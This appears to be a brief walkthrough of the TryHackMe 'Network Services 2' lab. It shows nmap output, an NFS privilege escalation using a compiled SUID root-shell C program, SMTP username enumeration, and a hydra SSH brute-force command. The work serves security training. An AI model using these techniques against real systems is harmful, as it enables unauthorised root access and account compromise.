https://tryhackme.com/room/networkservices2
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 73:92:8e:04:de:40:fb:9c:90:f9:cf:42:70:c8:45:a7 (RSA)
| 256 6d:63:d6:b8:0a:67:fd:86:f1:22:30:2b:2d:27:1e:ff (ECDSA)
|_ 256 bd:08:97:79:63:0f:80:7c:7f:e8:50:dc:59:cf:39:5e (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34399/tcp6 mountd
| 100005 1,2,3 48611/udp6 mountd
| 100005 1,2,3 54585/tcp mountd
| 100005 1,2,3 59496/udp mountd
| 100021 1,3,4 43281/tcp nlockmgr
| 100021 1,3,4 46247/tcp6 nlockmgr
| 100021 1,3,4 56258/udp nlockmgr
| 100021 1,3,4 57958/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
35359/tcp open mountd 1-3 (RPC #100005)
43281/tcp open nlockmgr 1-4 (RPC #100021)
45589/tcp open mountd 1-3 (RPC #100005)
54585/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 111 and port 2049 could be interesting port for us. Listing NFS shares
showmount -e <IP>
Mounting the NFS share to local machine
sudo mount -t nfs -nolock IP:share /tmp/mount
We will be using this c code, and compile it and name it as bash using gcc code.c -o bash
Do not forget that we need to compile this code as root use which means we need sudo su
int main()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
To set the SUID bit set using chmod
sudo chmod +s bash
The default port of SMTP is on port 25
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 62:a7:03:13:39:08:5a:07:80:1a:e5:27:ee:9b:22:5d (RSA)
| 256 89:d0:40:92:15:09:39:70:17:6e:c5:de:5b:59:ee:cb (ECDSA)
|_ 256 56:7c:d0:c4:95:2b:77:dd:53:d6:e6:73:99:24:f6:86 (ED25519)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: polosmtp.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=polosmtp
| Subject Alternative Name: DNS:polosmtp
| Not valid before: 2020-04-22T18:38:06
|_Not valid after: 2030-04-20T18:38:06
Service Info: Host: polosmtp.home; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumerating username, first we need to install smtp-user-enum
sudo apt install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 10.10.1.29
After getting the user, use hydra to brute force the SSH login
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.1.29 ssh -t 64